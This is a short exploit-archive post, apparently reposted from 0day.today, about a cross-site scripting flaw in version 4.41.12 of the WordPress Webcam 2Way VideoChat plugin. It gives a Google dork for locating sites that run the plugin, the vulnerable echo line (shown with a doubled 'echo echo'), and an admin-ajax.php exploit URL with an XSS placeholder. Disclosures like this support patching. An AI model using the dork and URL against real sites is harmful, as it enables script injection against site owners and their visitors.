WordPress Webcam 2Way VideoChat plugin XSS Vulnerability

Posted on Posted in Exploit
Full title WordPress Webcam 2Way VideoChat plugin XSS Vulnerability
Date add 01-12-2015
Category web applications
Platform php
Risk
Security Risk Medium
# Exploit Title: WordPress plugin webcam-2way-videochat  XSS Vulnerability
# Software Link: https://wordpress.org/plugins/webcam-2way-videochat/
#Version:4.41.12
# Google dork: inurl:/wp-content/plugins/webcam-2way-videochat
######################################################################
  
 The code in ./webcam-2way-videochat/webcam-2way-videochat.php
  
      default:
            848: echo echo sanitize_file_name($_GET['task']) . '&ajax='; 
  
Exploit
http://server/wp-admin/admin-ajax.php?action=v2wvc&task=/*XSS_HERE*/

Quelle: 0day.today

Facebooktwittergoogle_plus